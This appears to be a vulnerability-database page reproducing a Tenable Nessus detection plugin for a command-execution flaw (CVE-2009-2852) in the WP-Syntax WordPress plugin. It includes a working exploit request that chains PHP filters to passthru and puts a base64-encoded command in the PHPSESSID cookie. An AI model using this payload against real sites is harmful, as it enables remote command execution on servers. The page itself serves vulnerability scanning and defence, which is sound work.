6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
7.4 High
AI Score
Confidence
Low
0.02 Low
EPSS
Percentile
89.0%
The installation of WordPress on the remote web server includes the WP-Syntax plugin, a third-party add-on that provides clean syntax highlighting supporting a wide range of programming languages.
The version of WP-Syntax installed on the remote host fails to initialize the βtest_filterβ array variable in the βtest/index.phpβ script. Provided that PHPβs βregister_globalsβ setting is enabled, an anonymous remote attacker can leverage this issue to execute arbitrary commands subject the privileges of the web server user id by adding a specially crafted series of filters, which in turn will be executed in the βapply_filters()β function.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(40592);
script_version("1.22");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");
script_cve_id("CVE-2009-2852");
script_bugtraq_id(36040);
script_xref(name:"EDB-ID", value:"9431");
script_name(english:"WP-Syntax Plugin for WordPress 'apply_filters' function Command Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
command execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The installation of WordPress on the remote web server includes the
WP-Syntax plugin, a third-party add-on that provides clean syntax
highlighting supporting a wide range of programming languages.
The version of WP-Syntax installed on the remote host fails to
initialize the 'test_filter' array variable in the 'test/index.php'
script. Provided that PHP's 'register_globals' setting is enabled, an
anonymous remote attacker can leverage this issue to execute arbitrary
commands subject the privileges of the web server user id by adding a
specially crafted series of filters, which in turn will be executed in
the 'apply_filters()' function.");
script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/wp-syntax/#changelog");
script_set_attribute(attribute:"see_also", value:"https://plugins.trac.wordpress.org/changeset/395779/wp-syntax");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 0.9.10 or later");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(20);
script_set_attribute(attribute:"vuln_publication_date", value:"2009/08/13");
script_set_attribute(attribute:"patch_publication_date", value:"2011/06/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/08/14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ryan.mcgeary:wp-syntax");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2009-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("wordpress_detect.nasl");
script_require_keys("installed_sw/WordPress", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");
app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
plugin = "WP-Syntax";
# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);
if (!installed)
{
checks = make_array();
path = "/wp-content/plugins/";
checks[path + "wp-syntax/README.txt"][0] =
make_list('=== WP-Syntax');
# Ensure plugin is installed
installed = check_webapp_ext(
checks : checks,
dir : dir,
port : port,
ext : plugin
);
}
if (!installed)
audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = "ipconfig /all";
else cmd = "id";
cmds = make_list(cmd);
}
else cmds = make_list("id", "ipconfig /all");
cmd_pats = make_array();
cmd_pats["id"] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats["ipconfig /all"] = "Subnet Mask";
# Try to exploit the issue.
i = rand() % 255;
sep = string(SCRIPT_NAME, "-", unixtime());
url =
"/wp-content/plugins/wp-syntax/test/index.php?" +
"test_filter[wp_head][" + i + "][0]=session_start&" +
"test_filter[wp_head][" + i + "][1]=session_id&" +
"test_filter[wp_head][" + i + "][2]=base64_decode&" +
"test_filter[wp_head][" + i + "][3]=passthru";
foreach cmd (cmds)
{
exploit = cmd + ";echo '<< " + sep + "'";
cookie = base64(str:exploit);
cookie = cookie - strstr(cookie, "=");
if (ereg(pattern:"[^a-zA-Z0-9]", string:cookie))
{
#debug_print("Can't encode exploit into a valid session identifier; skipping.");
continue;
}
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url,
add_headers : make_array("Cookie", "PHPSESSID="+cookie),
exit_on_fail: TRUE
);
# There's a problem if we see the expected command output.
if ('ipconfig' >< cmd) pat = cmd_pats['ipconfig'];
else pat = cmd_pats['id'];
if (egrep(pattern:pat, string:res[2]))
{
if (report_verbosity > 0)
{
report =
'\n' +
"Nessus was able to execute the command '" + cmd + "' on the remote" +
'\nhost using the following request :\n' +
'\n' + http_last_sent_request() + '\n';
if (report_verbosity > 1)
{
if (sep >< res[2])
{
output = res[2];
output = output - strstr(output, string("<< ", sep));
while ('media="screen" />' >< output)
output = strstr(output, 'media="screen" />') - 'media="screen" />';
}
else output = res[2];
snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
report +=
'\nThis produced the following output :\n' +
snip + '\n' + data_protection::sanitize_uid(output:output) + '\n';
}
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");
Vendor | Product | Version | CPE |
---|---|---|---|
wordpress | wordpress | cpe:/a:wordpress:wordpress | |
ryan.mcgeary | wp-syntax | cpe:/a:ryan.mcgeary:wp-syntax |